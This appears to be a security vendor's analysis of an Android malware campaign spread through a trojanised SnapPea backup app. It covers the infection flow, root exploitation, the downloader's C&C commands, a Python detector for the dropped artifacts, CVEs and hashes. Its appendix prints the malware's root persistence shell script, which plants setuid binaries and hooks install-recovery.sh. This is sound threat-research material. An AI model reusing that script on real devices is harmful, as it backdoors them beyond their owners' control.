On June 4th 2015, Check Point discovered multiple instances of a sophisticated mobile malware campaign. The malware was previously inaccurately categorized as part of a simple adware campaign rather than the relatively advanced threat it actually is. Subsequent research by our mobile security specialists has found that the campaign consists of a set of malicious applications that are automatically installed on Android devices after they are physically connected to PCs infected with a version of the backup application SnapPea.
The attack, which was discovered by Check Point Mobile Threat Emulation, employs an extraordinarily large number (12) of exploits in order to gain root access to an Android device. This is the first time we have seen this many exploits used in conjunction as part of one attack. It seems the developer has collected the exploits from several known exploit kits and employs them one after the other until one succeeds. Once an exploit runs successfully, the attacker obtains root access, which essentially gives them full control of the device.
This goes completely undetected by MDMs and enables the attacker to bypass any traditional security mechanisms. It’s worth noting that although each exploit is part of a known root kit, this unique combination means that only an advanced sandboxing solution could have identified the threat.
What does the Malware do?
Once installed on an Android device, the malware attempts to contact its C&C servers and relay various forms of user and device data. It seems that the malware can collect data about the user, device parameters and cell network information.
The malware installs a varying number of applications without the user’s consent. The installed applications are currently used for adware, although the activity could clearly be changed to serve a much more malicious payload.
The malware has several evasion techniques ranging from the ability to hide its main code logic in system code folders to reinstalling itself after a removal attempt.
How can a Device be Infected?
This is a relatively complex Android attack that is infecting devices via a malicious version of a Windows backup application named SnapPea.
What is the infection flow?
- The infection flow begins with a user installing a malicious version of SnapPea on their PC
- If and when an Android device is connected to the machine, the SnapPea Android component is installed on the mobile device (with permission from the user).
- Once SnapPea is installed on the mobile device, repackaged versions of two apps (Daily Racing 1.3 and BatteryBot 8.3.5_zh10169) that contain malicious payloads are installed automatically (without user permission) and begin the process of installing malware on the device.
- Using the aforementioned set of 12 exploits, it obtains root rights on the device, adds itself to the boot sequence and then starts listening for C&C server commands
It seems that the malware is only installed if the flow happens exactly as described above. If a user manually installs SnapPea from the Google Play Store, no malware is installed.
Detailed Analysis
Execution flow
Exploitation phase
- Decodes two ELF files from a string and saves them to its own folder under the names “.service” and “.client”
- Decodes an APK file from a string and saves it to its own folder under the name “.dler.apk”
- Iteratively decrypts each of the 12 exploits from a string and tries to execute it in order to obtain root
Post exploitation phase
- In case of successful privilege escalation, the application runs a shell script (Appendix 1), which performs the following actions:
a. Copies the .service file to /system/xbin/.ext.base
b. Copies the .client file to /system/xbin/.b
c. Appends a string to the /system/etc/install-recovery.sh file, which will execute the previously created file /system/xbin/.ext.base after a factory reset.
- Silently installs the previously extracted file .dler.apk, which contains the downloader app. This application’s package name is com.android.hardware.ext0
- Starts the activity com.android.hardware.ext0.WakeActivity from the downloader app
Downloader application
- Installs a receiver for PACKAGE_ADDED intents, which collects a list of all installed applications
- Starts a service which relays the list of installed applications to a remote server. The server sends back a list of commands. There are two types of command: Update and Uninstall.
a. Update commands contain URL, md5 hash and package name parameters. During an update, the downloader removes the application with the given package name, then downloads a file from the given URL. If the md5 hash of the downloaded file matches the md5 hash from the command, the downloader silently installs the file.
b. Download commands contain a package name.
c. The downloader uninstalls the application with the given package name.
d. When the downloader starts, MobClickAgent is activated with the given SDK ID.
Appendix 1. Installation shell script
am \"am start -n /com.android.hardware.ext0.WakeActivity --es channel_name "channel_name"
mount -o remount rw /system;
chmod -i -a /system/etc/install-recovery.sh;
echo -e '#!/system/bin/sh\n /system/xbin/.ext.base & \n ' > /system/etc/install-recovery.sh;
chmod 755 /system/etc/install-recovery.sh;
chattr +i +a /system/etc/install-recovery.sh;
chmod 777 /files/.dler.apk;
pm install -r /files/.dler.apk;
cat /files/.service(zipservicepath) > /system/xbin/.ext.base (server_path)
chown 0.0 /system/xbin/.ext.base
chmod 6777 /system/xbin/.ext.base
cat files/.client (zipclientpath) > /system/xbin/.b(client_path)
chown 0.0 /system/xbin/.b
chmod 6777 /system/xbin/.b
chmod 6777 /system/xbin/.b
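As an added example that is not part of the original Check Point analysis, the following Python helper checks a snapshot of a device's /system (path -> FileInfo, as one could assemble from adb shell stat and cat output) together with the installed package list for the artifacts the script above leaves behind: the two root-owned setuid binaries, the rewritten install-recovery.sh, and the downloader package. The snapshot format, the FileInfo class and the sample snapshots are constructed for this example.

```python
import re
import stat
from dataclasses import dataclass

# Paths and package name as given in the analysis above.
DROPPED_BINARIES = ("/system/xbin/.ext.base", "/system/xbin/.b")
RECOVERY_HOOK = "/system/etc/install-recovery.sh"
DOWNLOADER_PKG = "com.android.hardware.ext0"

@dataclass
class FileInfo:                      # constructed snapshot record, one per file
    mode: int                        # full st_mode (file-type bits plus permission bits)
    uid: int
    gid: int
    content: bytes = b""

def find_persistence(snapshot: dict, installed_packages: list) -> list:
    """Return one finding string per indicator present in `snapshot`
    (path -> FileInfo) and in the list of installed package names."""
    findings = []
    for path in DROPPED_BINARIES:
        info = snapshot.get(path)
        if info is None:
            continue
        # The script does `chown 0.0` and `chmod 6777`: root-owned, setuid and world-writable.
        if info.uid == 0 and info.gid == 0 and info.mode & stat.S_ISUID and info.mode & stat.S_IWOTH:
            findings.append(f"{path}: root-owned setuid binary, mode {stat.S_IMODE(info.mode):04o}")
        else:
            findings.append(f"{path}: unexpected hidden file in /system/xbin")
    hook = snapshot.get(RECOVERY_HOOK)
    if hook is not None:
        # install-recovery.sh runs at boot; the script rewrites it to launch .ext.base in the background.
        for line in hook.content.decode(errors="replace").splitlines():
            if re.search(r"/system/xbin/\.ext\.base\b", line):
                findings.append(f"{RECOVERY_HOOK}: launches .ext.base at boot: {line.strip()!r}")
                break
    if DOWNLOADER_PKG in installed_packages:
        findings.append(f"package {DOWNLOADER_PKG} installed (downloader component)")
    return findings

# Constructed sample snapshots: a device after the script ran, and a clean device.
INFECTED = {
    "/system/xbin/.ext.base": FileInfo(stat.S_IFREG | 0o6777, 0, 0, b"\x7fELF"),
    "/system/xbin/.b": FileInfo(stat.S_IFREG | 0o6777, 0, 0, b"\x7fELF"),
    RECOVERY_HOOK: FileInfo(stat.S_IFREG | 0o755, 0, 0,
                            b"#!/system/bin/sh\n /system/xbin/.ext.base & \n \n"),
}
CLEAN = {RECOVERY_HOOK: FileInfo(stat.S_IFREG | 0o755, 0, 0, b"#!/system/bin/sh\n")}
```

On a real device the chattr +i +a attributes set by the script mean the hook file cannot simply be deleted; the finding is a signal to reflash /system rather than to clean in place.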
CVEs
While the malware utilizes 12 different exploits, only 2 of them have official CVEs:
- VROOT – CVE-2013-6282
- Towelroot – CVE-2014-3153
List of C&C servers
Hashes (SHA-256)
- Daily Racing 1c67bbce4af955b47d9b27037a6f063e06e08e500f1daaa3807043242a64eec0
- Battery Pro b066ed08c0a1e1dc074edb852678df2d48f7f5fcc88d80dbc787822fde84e455